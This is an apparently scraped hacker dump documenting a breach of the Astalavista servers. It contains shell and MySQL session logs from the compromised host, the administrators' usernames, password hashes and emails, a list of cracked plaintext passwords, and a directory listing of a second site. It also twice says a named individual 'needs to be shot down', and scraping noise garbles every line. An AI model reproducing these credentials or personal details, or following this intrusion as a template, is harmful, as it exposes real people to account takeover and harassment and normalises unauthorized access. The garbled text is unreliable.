<lastBuildDate>’ . date(’F, j M Y H:i:s O’) . ‘</lastBuildDate>. N' L5 ?: c4 x3 R
<docs>http://blogs.law.harvard.edu/tech/rss</docs>( x5 l& A; K) T/ M5 m
<generator>Astalavista.com</generator>" q' N2 N* n& f: V: |. u7 s: l
<webMaster>info@astalavista.com</webMaster>’ . $items . ‘7 N9 F3 @, q5 q# f- i3 `' E
</channel>
+ m+ b$ ^5 B# y' ]3 e9 a0 I9 e2 J</rss>’;
' R+ T/ D1 a. s' I$ `9 j7 U+ ?- U5 `! Y6 L$ h1 X6 H8 N+ z3 a2 X
if (file_exists(FULLPATH . ‘/feed/exploits.xml’)) {$ [2 h+ Z: Q c
unlink (FULLPATH . ‘/feed/exploits.xml’);
" k+ u t4 S7 X, H! }: L }
S8 C5 V' q3 x+ w% @1 P4 s+ R$ [# D* N- L! M3 j- c/ W
file_put_contents(FULLPATH . ‘/feed/exploits.xml’, $xml);
1 H) r! ~( F9 B1 m( b[snip]
# y# D5 s( v5 Q; N K
! N6 Q4 ~' R* _. Tsh-3.2$ cat exploits.sh
6 c2 E' J t0 r#!/bin/sh
* Y$ d: w1 e4 e7 C& i5 t5 j8 O# D2 ^$ f, u- F! l, o6 y% V. {) N
###########################################################9 B5 Q4 ? n+ ^. {4 q0 V# ~7 u) K
# #
1 u! k" l9 E4 `# P7 q# Title: milw0rm exploits adder #
7 P( J o/ z# h$ Q* X: E) p# Description: Add all milw0rm exploits to the #2 s7 |7 \2 {2 u4 s$ O' K/ l
# Astalavista.com database #
7 ` y% }* o6 n5 M5 C0 G3 }* ]* X$ R# #& \+ |8 }- Y9 W" Y6 O7 [" F
# Company: Astalavista Group #
" g+ c. A3 ]8 a; N: V4 S# Author: Paulo M. Santos #
4 a. K4 U% W* ~6 q* m5 J+ c# E-Mail: 链接标记paulo.santos@astalavista.ch #
/ Z# o0 g; u) N8 v1 {# #$ }4 ~" z0 s2 w6 o
###########################################################' W) _ T, N v1 Q F9 r t- N) `
. B7 x3 @3 J+ {* w' e5 ^# path7 b/ _9 ^! @- k. |# T
this_path=/home/com/public_html/modifications/cronjobs% ^, p9 W3 [ @" G. i3 z
3 V8 {% h/ S$ w; M) y# change directory
4 x3 ?. Y: j. k7 P& l F+ Hcd $this_path# ~& I7 D7 T* r4 U1 z$ x& ^
cd tmp/
% G+ \2 {7 V! ?4 w# u5 b0 i' h9 _8 o1 {
# delete files9 T3 C% M# Y4 r: \: P
rm -rf milw0rm.tar.* &( t: W$ z" a0 B- ]- Y) h0 ~( Q
rm -rf milw0rm/ &
, `! k- Y' q0 w$ S5 n( q: i1 G1 W: J, Z" ?' D. t1 d4 ~
# wget milw0rm paket
4 }6 { x/ e4 L/ Y& b" X! _* d; `9 Hwget 链接标记[url]http://www.milw0rm.com/sploits/milw0rm.tar.bz2[/url]6 I6 b3 ]0 G' S8 n" u9 k) v
0 [+ E- S( {8 W2 D; d# P3 k# extract milw0rm paket3 R- e, f) d4 C& X/ K$ Z
tar -xvf milw0rm.tar.bz28 r, f- x5 X- b3 q! @% Q/ d |
; c' t! o7 S) g
# change owner3 v* J" _: o5 f. ~! x4 R
chown -R com . ?7 e. }0 b% X; k1 Z( }7 N
chgrp -R com .5 o' \! h6 Q( z" M$ _
4 E$ M; r G! r6 P. ^" K# ^# execute php script' b5 I/ K/ g. O8 @
cd $this_path
9 t7 @2 o7 m7 e9 P; Rphp -q exploits.php' K5 x7 W& O. a5 q d! G7 W. a
1 H5 n1 r O5 M, c* a: q) \( }$ @
# delete files; p4 k8 C: u* R" t( s8 l! Y
rm -rf tmp/milw0rm.tar.*
' T2 t$ w' P. ~5 c* _! frm -rf tmp/milw0rm/
" T1 \) H! X; h1 a4 P2 J) \% i5 N7 n+ D h- T
sh-3.2$ echo “Paulo M. Santos needs to be shot down.”
2 X; m- C0 n" J. y5 CPaulo M. Santos needs to be shot down.3 Q. i! N, }& Q1 f! j% |
! b5 U& ]# d% ~, [$ b, X
mysql -u contrexxuser2 -p
4 W, w) Y c" v( R# J3 XEnter password:
3 C" {$ F* E) Q( Z& Z) A& rWelcome to the MySQL monitor. Commands end with ; or \g.: D; I: h* _( t- v/ z
Your MySQL connection id is 261694; j6 W; s& Z; l
Server version: 5.0.45-community-log MySQL Community Edition (GPL): f3 J; h" N7 Q$ H s/ i
9 l0 W9 [: N1 jType ‘help;’ or ‘\h’ for help. Type ‘\c’ to clear the buffer.
( a8 w1 S* K; F* d' U( I" ?. ]% u# y: _ e- K
mysql> show databases;" I5 r4 R8 T- T) Q
+——————–+
8 K) F& P6 i9 ~) n: k| Database |, w x0 r" y. I; c
+——————–+
; I8 O. P; K; r: U1 ^0 Z| information_schema |, s- u) H* J9 K
| com_contrexx2 |
1 ^! l, C+ P# D9 m Y| com_contrexx2_live |
3 w3 j! n9 F2 f9 p9 Z+ \3 v+ B6 h| test |
3 ^6 J- E. q. ]- z* {* k+ y& ^( L+——————–+
9 N& _2 k, x; V; ?9 C" Z4 m/ i, j4 rows in set (0.00 sec)
7 H2 {: I5 {$ `
. G6 M, K0 C( s8 H- T6 @$ k0 u0 umysql> use com_contrexx2_live, i5 j0 e. [: `( w
Database changed
8 m( w$ W, H. \: F1 L$ a9 T" omysql> show tables;" x, V1 @! b1 ], v) A
+————————————————–+: X( T4 Y. ^- F% R
| Tables_in_com_contrexx2_live |/ H" L+ f A- j# ]+ K+ h9 K
+————————————————–+
/ t, d+ O0 C, B8 x) y! s| cc_banner_counter |
) C' r6 C; ? Q( E* S| cc_search_counter |+ `$ ~4 m* n/ z& |! z
| contrexx_access_group_dynamic_ids |
1 b4 @1 @' d7 _' H- B& V# o7 U! H' K| contrexx_access_group_static_ids |( ^. e9 G `) m9 E% U
| contrexx_access_rel_user_group |
3 ^1 F4 ~$ T. O: ^$ ~4 p o| contrexx_access_settings |
2 U8 P1 n/ \1 a; L/ g| contrexx_access_user_attribute |4 d% u& P$ ^0 L f
| contrexx_access_user_attribute_name |
5 w( P9 M5 g2 n1 B% e6 _| contrexx_access_user_attribute_value |8 s/ J4 `- R* ~6 O2 R$ {1 l9 z
| contrexx_access_user_core_attribute |
8 t( U+ d1 W7 C7 x) n0 P0 ]2 _| contrexx_access_user_groups |
1 s: K3 M+ i$ a2 V7 T| contrexx_access_user_mail |
/ u8 U1 }. Q+ W* J; u$ U| contrexx_access_user_profile |
2 C3 Y0 ?, X" i0 d- I! {6 V| contrexx_access_user_title |
8 |# [; S- Z$ z| contrexx_access_user_validity |
9 r5 c4 d, n9 b. C4 O/ A# C| contrexx_access_users |) \% f! Q3 \& ^) H
| contrexx_backend_areas |
8 v* o! I# W! Z% B2 o| contrexx_backups |
; n K1 Z1 g5 _$ s2 ~/ }- A| contrexx_content |/ Q" V4 ?+ b4 R, H+ U0 m# `- X6 s
| contrexx_content_history |* p7 s1 `9 t+ u' r# s T& p# O
| contrexx_content_logfile |
8 ]+ T0 H8 Q0 Y7 F, ]2 ^$ w! Z7 E. R2 s2 l| contrexx_content_navigation |- f) o2 X6 T5 }5 _4 I5 c; T
| contrexx_content_navigation_history |4 o8 }6 O5 I( g7 O0 A
| contrexx_ids |3 G1 s& L5 k- \" Z. {
| contrexx_languages |- c' v/ ~. E# ]) H/ u+ p6 ?
| contrexx_lib_country |
. R. ?" t3 ~7 [| contrexx_log |5 H: A' O3 g" a& H$ l( W8 x1 b3 D
| contrexx_module_alias_source |
$ A0 D+ K. L, m* G; b| contrexx_module_alias_target |
3 w9 [. A& I5 S- m, i% Q5 T& || contrexx_module_block_blocks |
( o2 o! m$ D' ^; f| contrexx_module_block_rel_lang |" e C) Z" ]6 z* c
| contrexx_module_block_rel_pages |
# R# W/ H) D+ G4 X& L| contrexx_module_block_settings |
. Y6 n! q$ P% H# l0 q0 W| contrexx_module_blog_categories |! S2 g& j# `2 k% W2 `
| contrexx_module_blog_comments |
4 R# X5 ]) A7 y- G! n* ^| contrexx_module_blog_message_to_category |9 ^4 A2 \3 q4 Z* p; i) l. s
| contrexx_module_blog_messages |# H" w5 i; z+ H& H; t+ J9 H, S
| contrexx_module_blog_messages_lang |4 J" W# j4 K) C5 M
| contrexx_module_blog_networks |
- K9 z! L) `3 v) m- W+ P& Y! t| contrexx_module_blog_networks_lang |
1 q7 D( |/ e! P# h! a| contrexx_module_blog_settings |7 z3 Y- V9 q G# L1 ~7 r
| contrexx_module_blog_votes |* \5 W4 H B2 G
| contrexx_module_calendar |' W0 F9 H; S/ V/ `
| contrexx_module_calendar_access |/ k: j4 A- g3 z9 A7 v' r% l( a
| contrexx_module_calendar_categories |
4 `. J9 S% _1 n' k| contrexx_module_calendar_form_data |# t% w( o7 y- r- G3 n+ i4 u
| contrexx_module_calendar_form_fields |
{8 \. `* W4 J4 i| contrexx_module_calendar_registrations |5 L4 W) T; m& c9 N
| contrexx_module_calendar_settings |2 G. K& C/ v8 [; b3 g0 X' y
| contrexx_module_calendar_style |
! r5 b2 t" S/ }/ V5 Z+ l6 {1 x| contrexx_module_contact_form |& d2 ]8 L/ X# h6 t
| contrexx_module_contact_form_data |( o+ X5 T( f- j) A j
| contrexx_module_contact_form_field |
9 x' k2 {! E" }# U| contrexx_module_contact_settings |
2 g* y+ n$ c, E. e& v2 Q| contrexx_module_data_categories |$ X s$ y; P, E: c: a
| contrexx_module_data_message_to_category |
: R7 j; @8 B( b6 v% w" H| contrexx_module_data_messages |/ c) g' ~2 p6 j9 J& f8 @/ r. y
| contrexx_module_data_messages_lang |2 i2 Q( n6 Q( F
| contrexx_module_data_placeholders |
& y) T: ]' N; _+ F; y| contrexx_module_data_settings |
( U+ @( [" t/ ?, f: F2 q% p| contrexx_module_directory_access |2 p# B4 e4 a# N7 H- P8 p
| contrexx_module_directory_categories |' F" X; A( b3 r) `+ O/ n
| contrexx_module_directory_dir |. L( Q0 L5 L+ X# h3 W
| contrexx_module_directory_inputfields |, T2 z+ g1 u, g0 m. M* m9 s
| contrexx_module_directory_levels |3 p) o# F, |' T& I8 x. Q+ V
| contrexx_module_directory_mail |$ b9 ~% `6 T. m G2 `
| contrexx_module_directory_rel_dir_cat |
! u# M# _' D5 U| contrexx_module_directory_rel_dir_level |
. \, z. p& |9 V6 a8 L. O5 y# f t| contrexx_module_directory_settings |
4 D \+ P- Y9 M0 J- Z7 p& A* q" n| contrexx_module_directory_settings_google |
7 f j/ W& i4 w. _) b6 a1 W1 W| contrexx_module_directory_vote |& {2 W' V; e! o3 |: S& P
| contrexx_module_docsys |: N4 i$ r1 d2 o8 ~* ^, P6 B* U
| contrexx_module_docsys_categories |
! k9 {/ K3 Q% B4 t1 \| contrexx_module_egov_configuration |
0 ^# y* i2 q$ e* D. i5 y2 k' F, `9 o| contrexx_module_egov_orders |) J. v# }( T) w: R/ n4 T. a1 X" w
| contrexx_module_egov_product_calendar |1 |6 m& g8 y+ `3 e
| contrexx_module_egov_product_fields |( f. U1 p" a3 [3 G" p- Y
| contrexx_module_egov_products |
2 z9 j D9 b, J0 C" @/ A% d& x' L7 X| contrexx_module_egov_settings |0 w2 x( }$ x/ W* }! ?
| contrexx_module_exploits |3 Y9 L( I1 u$ M1 {8 z
| contrexx_module_exploits_categories |
% R4 G$ ]) e; ^ N& c| contrexx_module_feed_category |
7 A; S8 p. r4 Z| contrexx_module_feed_news |4 E3 q2 [- M# Q7 x: _- i5 {$ b. S, r7 |$ r
| contrexx_module_feed_newsml_association |2 u2 B7 y7 x7 G5 u: W' L
| contrexx_module_feed_newsml_categories |" Q l2 W+ M/ L& {# y! [9 W7 s8 H; C
| contrexx_module_feed_newsml_documents |
3 G+ d( \/ n! n+ D! f| contrexx_module_feed_newsml_providers |$ u& L+ i- S& C! A6 d8 n
| contrexx_module_forum_access |
( e# U. K- p' B* Z/ ]| contrexx_module_forum_categories |: Q9 `: B* Q1 W6 x$ O
| contrexx_module_forum_categories_lang |
. q0 B) b6 p4 ?3 O! s0 ]| contrexx_module_forum_notification |& o" x" b. {3 q: s5 ]
| contrexx_module_forum_postings |' r: ~1 M4 X# P
| contrexx_module_forum_rating |
( W% _- O1 ~! S- b |' t| contrexx_module_forum_settings |. N6 a" Y# V3 j5 T, M: V
| contrexx_module_forum_statistics |9 R; L% X T! m; {+ ~ t, K
| contrexx_module_gallery_categories |9 _3 B( g! F1 J3 h a9 y
| contrexx_module_gallery_comments |8 e$ O9 L1 L& P# E
| contrexx_module_gallery_language |( V V7 V: A" D- D7 o8 O
| contrexx_module_gallery_language_pics |
9 q1 H4 g8 t# ^ u$ j& j! Y4 }| contrexx_module_gallery_pictures |
# ~, B" r* W* c: r" C2 i+ C| contrexx_module_gallery_settings |3 w$ v% v2 r, \1 Z6 Y1 p: @
| contrexx_module_gallery_votes |) y" I3 x/ { l+ E1 u% p1 ~% }
| contrexx_module_guestbook |
+ V) t! V, V3 y6 ]; r% L| contrexx_module_guestbook_settings |( a' V2 F" l6 a) p j6 o
| contrexx_module_livecam |
8 p. C9 A' ^! G# G0 i| contrexx_module_livecam_settings |
" ? I6 v- ]3 D6 `, w. || contrexx_module_market |# z, X& V& s* g N/ I2 f/ L b" {) {
| contrexx_module_market_access |
( j' ?4 i* k0 @3 J3 ?, T| contrexx_module_market_categories |- s, p1 {& L1 o+ K/ b! |
| contrexx_module_market_mail |1 U) V/ e* r' ^8 B, M" ~/ j
| contrexx_module_market_paypal |
6 |( `0 W" x( S1 b2 ?| contrexx_module_market_settings |" P; Z/ z6 \1 h6 f1 l2 O2 o
| contrexx_module_market_spez_fields |
" }0 W/ k( h5 T* }: C" ^- d| contrexx_module_mediadir_access |
B$ d: N8 P: S0 {5 z/ e/ G. g| contrexx_module_mediadir_categories |
9 d5 W9 R' o( ~+ \| contrexx_module_mediadir_comments |0 a* V0 ?( Q& ~1 X. v- `7 B* H
| contrexx_module_mediadir_dir |) |1 U, Z1 i7 p; Q6 E
| contrexx_module_mediadir_inputfields |+ F& B1 o# |/ B: Z0 \" }
| contrexx_module_mediadir_levels |3 C% x C0 H6 G
| contrexx_module_mediadir_mail |' m* I4 V! h; S7 h0 b
| contrexx_module_mediadir_rel_dir_cat |. u, z. G4 P" x2 ~
| contrexx_module_mediadir_rel_dir_level |; M7 r& N% H) h& _. k/ M5 |
| contrexx_module_mediadir_reports |
3 h8 M+ c% v$ {+ N| contrexx_module_mediadir_settings |
' e( ]! f# U/ d! z9 C; [5 g) s N| contrexx_module_mediadir_settings_google |
: M7 Z$ u+ ]: U$ F- y: d$ o$ e| contrexx_module_mediadir_vote |- e* m' g% K# k
| contrexx_module_memberdir_directories |
* G1 l: B/ V; ~# h/ q( @| contrexx_module_memberdir_name |
0 w U. A1 b9 Y& l! ^! ~, e| contrexx_module_memberdir_settings |/ l1 P+ a- m8 E0 D
| contrexx_module_memberdir_values |
, z8 [3 e; I. }| contrexx_module_nettools_allowed_groups | C% r5 [* }) S7 n
| contrexx_module_nettools_settings |- Y4 n# t) F, l$ u
| contrexx_module_news |
' T9 O4 t ~) a+ E. [| contrexx_module_news_access |3 f. ?5 ~6 s# E) `, c& g
| contrexx_module_news_categories |; f9 m$ @ e. p0 B4 f: N$ j! _, ^& y( l
| contrexx_module_news_settings |
0 Z4 s& e* V; E- [% @0 F; i9 I| contrexx_module_news_teaser_frame |% h& Y* ]8 l( y8 A, [+ b. W, _
| contrexx_module_news_teaser_frame_templates |0 C+ P2 X: K' D& B) Y
| contrexx_module_news_ticker |
, d9 ?: Q7 c y| contrexx_module_newsletter |' i9 u% H; f7 ]% J
| contrexx_module_newsletter_attachment |
% X! @: m+ Y2 @1 {5 _% M4 L v| contrexx_module_newsletter_category |
v, W& T7 C/ w, i% y G| contrexx_module_newsletter_confirm_mail |$ T& {2 X! i( ~ v" y- v2 p
| contrexx_module_newsletter_rel_cat_news |' y& [% _$ I3 F1 L7 T# M1 t
| contrexx_module_newsletter_rel_user_cat |
1 D$ z, n8 {7 J# k5 J! b| contrexx_module_newsletter_settings |% Z" ~: Q$ y. H0 p& [
| contrexx_module_newsletter_template |
b) [" }0 a# J0 n! }) ~ J4 t| contrexx_module_newsletter_tmp_sending |! u% a3 H) }# K: W3 f
| contrexx_module_newsletter_user |
- G' S8 b( j# ?0 o# ^6 W9 s| contrexx_module_newsletter_user_title |5 u3 h' q5 r4 Y) d0 ]9 s- ~
| contrexx_module_onlinetools_defaultports |& y4 F! s" C! z# q& B0 D0 w- I
| contrexx_module_onlinetools_defaultports_back |
' l4 K: `: d/ y2 X$ r| contrexx_module_onlinetools_geolitecity_blocks |7 D. w% B7 `" T8 N2 I! L
| contrexx_module_onlinetools_geolitecity_country |
8 b; j- C' z) B6 w& V| contrexx_module_onlinetools_geolitecity_location |* U( q1 \ `& a' U5 E7 l; W- f# z
| contrexx_module_podcast_category | k' e* n( H' }" [/ C
| contrexx_module_podcast_medium |& [. w8 c, y* h6 ?- z) ?: P: T: ^& v
| contrexx_module_podcast_rel_category_lang |
; N# O7 a1 l4 z5 _| contrexx_module_podcast_rel_medium_category |6 y2 T( f! `% @" ^
| contrexx_module_podcast_settings |$ |6 s. k$ i& k# f- D. L! T! L0 {
| contrexx_module_podcast_template |
! k5 }: k! X; z# M6 F| contrexx_module_proxydb |
( f3 ` F' ]9 {| contrexx_module_recommend |9 Q0 B6 n) n4 B& y1 \- ~9 K9 N0 s
| contrexx_module_repository |) ]- h+ z4 j2 J
| contrexx_module_securitynews_cats |
: y' O. T+ s( d Q' a| contrexx_module_securitynews_feeds |
/ ]; m; `) R! y& S3 S g$ @: D| contrexx_module_securitynews_news |( c+ c1 V: P0 n" O% M: h. k
| contrexx_module_shop_categories |
# X) y7 U" j1 H. c5 Q! C| contrexx_module_shop_config |; } a8 u8 ]: r
| contrexx_module_shop_countries |) b# q5 d( A$ _2 L2 ?/ N
| contrexx_module_shop_currencies |" A) J1 L0 r' e# |) }" i
| contrexx_module_shop_customers |3 z& U9 n$ u6 B) X0 H/ G
| contrexx_module_shop_importimg |" ]" ~# P( B+ @) B9 {8 P# o
| contrexx_module_shop_lsv |
2 b7 w) D c5 x1 K6 I0 I. M| contrexx_module_shop_mail |
. G! B" a4 O, S1 j8 G| contrexx_module_shop_mail_content |
1 f" H( x) C1 ~; F| contrexx_module_shop_manufacturer |
9 G* k- H, p, L. I! e| contrexx_module_shop_order_items |" c) G5 K$ K! l" z' t
| contrexx_module_shop_order_items_attributes |
2 Q' O9 @. K( O1 h6 C' s| contrexx_module_shop_orders |
6 q, B& d1 P: x$ e8 a| contrexx_module_shop_payment |
* {0 l" h6 M: F/ }3 ^$ H7 C| contrexx_module_shop_payment_processors |
/ S0 X, t7 T8 F, F5 h M| contrexx_module_shop_pricelists |% w5 _6 z2 }( l" S2 x# n
| contrexx_module_shop_products |
' J/ f5 O- ] k| contrexx_module_shop_products_attributes |/ R& {' C( g" Z( `( J9 J4 K
| contrexx_module_shop_products_attributes_name |
* a( o t0 o# R2 w/ d& d* b' y" Y| contrexx_module_shop_products_attributes_value |
% D" o, Q) X# n) j, G9 E9 K: N| contrexx_module_shop_products_downloads |
' j8 l: r. @ v b1 B8 X| contrexx_module_shop_rel_countries |
5 ~1 n1 t1 {4 y" f4 Y| contrexx_module_shop_rel_payment |& K b( N7 J/ y4 f- C, c C, y; U; d' ?
| contrexx_module_shop_rel_shipment |/ n6 ]% |6 w. q" R" U5 E# g9 l# g+ U4 }
| contrexx_module_shop_shipment_cost | d- f1 i" h- N3 C: h
| contrexx_module_shop_shipper |- x. C. Z' ?/ x2 Q2 \4 B
| contrexx_module_shop_vat |5 B% s6 X6 ~4 T( q) h
| contrexx_module_shop_zones |
& l$ K1 ]$ W* G* F- N+ V" o- P7 q- G| contrexx_module_u2u_address_list |* q3 O2 m5 s5 v Y S
| contrexx_module_u2u_message_log |
5 l) ], P/ y; b, U& H7 E2 i4 M& r| contrexx_module_u2u_sent_messages |% r0 `0 S8 f$ m- M
| contrexx_module_u2u_settings | } C1 k( p) M3 e0 N
| contrexx_module_u2u_user_log |
) ~' W% E* H8 @7 B b4 F2 c0 D+ ?| contrexx_modules |" B. p: \0 C1 d* R
| contrexx_sessions |
; g% G1 @* e- L3 W$ A+ n| contrexx_settings |$ w: G: y9 D1 U& s! \9 M Q( g/ q+ T
| contrexx_settings_smtp |
2 v8 B/ w) g4 r- C) N% }| contrexx_skins |$ d, p8 a+ E/ v5 c/ Q
| contrexx_stats_browser |$ ]% d% u. \# ^, |
| contrexx_stats_colourdepth |0 U3 e$ A, q3 N6 B. ~: R) c& D' f
| contrexx_stats_config |5 X# F: P% G: q" `; u, P
| contrexx_stats_country |" l) e8 P% [3 s& u; G7 P3 x
| contrexx_stats_hostname |
- W- x$ ~7 n0 L3 p/ J& t| contrexx_stats_javascript |
Y- n: @, A# [( {| contrexx_stats_operatingsystem |2 H- Q' k3 s. t- R9 O' {
| contrexx_stats_referer |1 Z$ D% p( V: P! A" t# \
| contrexx_stats_requests |
5 V C; I' X3 @| contrexx_stats_requests_summary |0 {+ M0 _/ ]7 z7 ^7 M( g# \" E" c
| contrexx_stats_screenresolution |& v z% L8 q+ U+ r z
| contrexx_stats_search |
3 O; u" a: y5 O! v6 r* h| contrexx_stats_spiders | a, k0 A1 x3 Q, k5 W) F0 b/ |
| contrexx_stats_spiders_summary |) K5 G( I: ]% b- `9 ?8 _
| contrexx_stats_visitors |# l' w; Q; x b" r
| contrexx_stats_visitors_summary |, [8 A7 z5 n$ N! m
| contrexx_voting_additionaldata |
3 M1 F) [( D- d$ f/ Z$ K6 @| contrexx_voting_email |
4 A0 z, I# o1 U$ y8 m9 X* C! f| contrexx_voting_rel_email_system | {1 A; ~& \- D* s0 L
| contrexx_voting_results |+ r/ w( D( {9 h6 q i
| contrexx_voting_system | n% V: U; o% E8 O: }% D( m' J" p1 I
| foo |. i- F; ]( m4 t( q0 R0 ?- G
+————————————————–+
2 P9 Y6 }5 P: L' D0 }227 rows in set (0.01 sec)
1 f1 U+ p8 r4 c0 Z3 @' L( L& ~
& i' O4 k/ s/ m$ s8 W$ E Smysql> select count(*) as skids from contrexx_access_users;" s: [" N1 ^' B( W& O r7 l
+——-+" Z7 z. ~5 y; g! e
| skids |
9 |$ A9 C5 j. z0 v* _+——-+
7 d' R% }+ T0 s' A8 Q' i) D7 T| 53699 |
( c- s$ E) r$ N" H8 a; x1 S1 P# Y+——-+
' F6 Y% S5 E5 r' r0 \; v1 row in set (0.00 sec)
) F% x# m( Y8 P4 E9 P* X
. g5 a' [- b+ fmysql> describe contrexx_access_users;
g; J. N+ z( ~4 X1 h2 E+——————+——————————————+——+—–+————–+—————-+
9 k8 p; D5 E; p" N" K9 z| Field | Type | Null | Key | Default | Extra |4 i9 f8 u5 u U* U' g6 `! R
+——————+——————————————+——+—–+————–+—————-+) v$ F) K6 [! {" f
| id | int(10) unsigned | NO | PRI | NULL | auto_increment |
* A. n4 O( \+ z6 \# ^| is_admin | tinyint(1) unsigned | NO | | 0 | |* b" f Z" u: K! v2 I: D, e6 R
| username | varchar(40) | YES | MUL | NULL | |7 w. I, t d* W
| password | varchar(32) | YES | | NULL | |
9 R$ C; E* k4 a2 r6 s5 h| regdate | int(14) unsigned | NO | | 0 | |8 T1 {7 B- O$ G. \
| expiration | int(14) unsigned | NO | | 0 | |( w9 g6 A; i$ [* L' \) o
| validity | int(10) unsigned | NO | | 0 | |
0 K/ i* C, C6 ]! z| last_auth | int(14) unsigned | NO | | 0 | |6 F. i' g) ^# \; ]8 J% n, y2 T
| last_activity | int(14) unsigned | NO | | 0 | |
- [- s: L& X$ t; e3 M( o( b| email | varchar(255) | YES | | NULL | |
# J- h& J( |4 I, @| email_access | enum(’everyone’,'members_only’,'nobody’) | NO | | nobody | | t; M4 {0 B6 |
| frontend_lang_id | int(2) unsigned | NO | | 0 | |
6 J J7 P& g: y6 A. M0 e| backend_lang_id | int(2) unsigned | NO | | 0 | |
" F' `4 e, w) Q: ?| active | tinyint(1) | NO | | 0 | |* ]# z2 y M: p' G
| profile_access | enum(’everyone’,'members_only’,'nobody’) | NO | | members_only | |3 p' A) n4 J5 B6 V
| restore_key | varchar(32) | NO | | | |% Y* q: `) b) G/ e: q; p/ e
| restore_key_time | int(14) unsigned | NO | | 0 | |! q2 @6 t6 p R" X
| u2u_active | enum(’0′,’1′) | NO | | 1 | |/ w4 ?* y L) v! `. p S
+——————+——————————————+——+—–+————–+—————-+
9 F: P' B& a4 K+ J' j' [( z% V18 rows in set (0.00 sec)% }) o1 M9 e* Y) R$ k
8 @8 e" R L3 |5 V5 s* n Qmysql> select username,password,email from contrexx_access_users where is_admin = 1;
. S4 W" A! o9 S9 ]+ L1 m# o+————+———————————-+—————————–+8 F$ q0 E- C4 b
| username | password | email |
- ~- I) K' |# Z( H, F+————+———————————-+—————————–+
, c z. P6 D( {: D: |3 H$ z| system | 0defe9e458e745625fffbc215d7801c5 | 链接标记info@comvation.com |
) h1 E$ c6 ~" a, O* _| prozac | 1f65f06d9758599e9ad27cf9707f92b5 | 链接标记prozac@astalavista.com |; m; X$ O# K9 x7 N
| Be1er0ph0r | 78d164dc7f57cc142f07b1b4629b958a | 链接标记paulo.santos@astalavista.ch |3 m: a1 ]/ B; r& q
| schmid | 0defe9e458e745625fffbc215d7801c5 | 链接标记ivan.schmid@comvation.com |
) p' _9 v' y4 j6 m6 R+————+———————————-+—————————–+& y9 Z$ Y1 b7 l* Y% K |# A2 k
4 rows in set (0.04 sec)( E4 a3 n$ k- I4 [2 N! v/ @* e
0 w" v$ ?% }! bmysql> exit;& x+ X+ A2 Q5 E7 i9 j! Z( J- j" R
Bye
# g0 o- L7 `2 w
9 q! w5 E- Q" x' o! Q[~] There you go, your “team of security and IT professionals” is a joke.
2 m$ x* G( E$ ]* k3 ^( V0 Y
3 A$ w& \" ]5 v& d! H+——————————+
% d7 O: Q' g7 Y0 O* G6 K3 p, a5 ]system:f82BN3+_*' u5 W- z" m9 x3 C; P; J
Be1er0ph0r:belerophor4astacom
% T' e0 n) _! `1 Z! M5 w0 u H5 B$ ]0 Yprozac:asta4cms!
& K7 t! `) t; u0 B/ v0 T" i0 P: ~commander:mpbdaagf6m
/ j$ ^' i+ Z8 G" a' B2 j- }+ E0 Tsykadul:ak29eral
: X5 e7 _& \2 ~. L% u) _* D, V+——————————+7 [2 Q) w& U+ A( k C
/ k) f! [" m- G0 t
[~] Paulo M. Santos AKA Be1er0ph0r needs to be shot down for his milw0rm ripping script(s)1 B6 Q% T" ^# P% J5 j; M- M0 h1 j
…and the others, find another area to get paid from, security isn’t for sale and you obviously fail at it.8 d) \8 t& A9 h' W
0 q# u; t Q) m' _; f& T[~] Lets move to astalavista.net now,
7 j) [$ j4 [/ K% R, x h4 D# s6 P0 `. z4 }1 [
From <链接标记[url]https://www.astalavista.net/[/url]>:6 r- ?1 b+ S; M% D* u
>> Everyone knows that the best defense is a good offense.
# p4 S$ F* ~7 C>> Those who wait for their foes to find a security loophole are opting for the wrong strategy.7 n M' M! k, [5 e& D C4 u; M
>> The ASTALAVISTA hacking & security community is the largest IT security community in the world.' B4 D# t0 m- k4 o
>> It.s a platform for both IT specialists and novices, and anyone interested in expanding and updating their knowledge regarding IT security and hacking.”
( _; a6 A' s5 g0 e; N& f& v+ Y& W8 W+ i# @* d' F3 _9 K2 M
>> Go ahead, try and hack our server . in a completely legal way!
! I1 X& [0 `, V, p, E' v7 ~>> Learn by doing: We offer our members tricky tasks and challenges on an6 U' u2 U: }; s; q i( y
>> ongoing basis so you can test your knowledge and abilities. You can also1 X7 J# K, e+ g9 L1 P! x
>> demonstrate what you.ve mastered by taking part in regular hacker contests# q3 Q/ E. t$ f' c5 u* G
>> and war games
8 i: P: `1 Z$ X( j0 V- G( u, L( s% f" }" ]
[~] Lets take a look there, after all… they are hack-proof, aren’t they?!
4 O# ~! Z9 f" X# W2 e4 v: t( m; f& G! K! o1 L' X0 s& G1 X
[-] Tricky task: Find home dir of astalavista.net0 `+ U* w- ?& Z- m: A$ h6 n
# w" E4 n/ v3 v# a, I. |$ Hsh-3.2$ ls -la ~astanet F, I" z+ n! K8 @' t% o
total 48' l7 d- o" {: i# M/ `
drwx–x–x 6 astanet astanet 4096 Dec 23 15:55 .
1 Y: I5 U; }7 s6 cdrwxr-xr-x 14 root root 4096 Mar 11 17:56 ..
6 ^) I# d5 R) p9 Xdrwxr-xr-x 2 root root 4096 Dec 23 16:00 auth
+ k- I6 o" B) m: i& w7 j0 |$ u-rw——- 1 astanet astanet 3892 Apr 16 12:14 .bash_history$ `$ j8 ?9 }* J- x6 F0 u2 I
-rw-r–r– 1 astanet astanet 33 Dec 17 21:50 .bash_logout
0 R% y$ B# G- f$ U: U1 h& |-rw-r–r– 1 astanet astanet 176 Dec 17 21:50 .bash_profile- J* ~, e( _. O1 C. T5 J K+ b9 S
-rw-r–r– 1 astanet astanet 124 Dec 17 21:50 .bashrc0 p: V( @! o1 b& x
drwx–x–x 3 astanet astanet 4096 Dec 23 12:18 domains
3 k4 j" a* n& q) p2 I( P. s4 Ndrwxrwx— 3 astanet mail 4096 Dec 23 12:18 imap
& o3 f3 }/ Q& C7 ydrwx—— 2 astanet astanet 4096 Dec 23 12:18 mail
4 Q; F, h7 l( f" i: `; R* elrwxrwxrwx 1 astanet astanet 37 Dec 23 12:18 public_html -> ./domains/astalavista.net/public_html+ t! d; M4 {% l9 o9 ]9 h
-rw-r—– 1 astanet mail 34 Dec 22 12:41 .shadow& o; i7 }, j; X* T' `, C
' |' |/ @) r" w" A
sh-3.2$ cd /home/astanet/domains/astalavista.net/private_html/
3 R, D$ r4 L3 s" W+ _9 }# e0 ~* h( Qsh-3.2$ ls -la
& ^, a2 a! u7 y; q; p$ U3 j- Stotal 200 N" M. I8 \1 F& A: H8 r& ?
drwxr-x— 29 astanet apache 4096 Jan 6 13:58 .
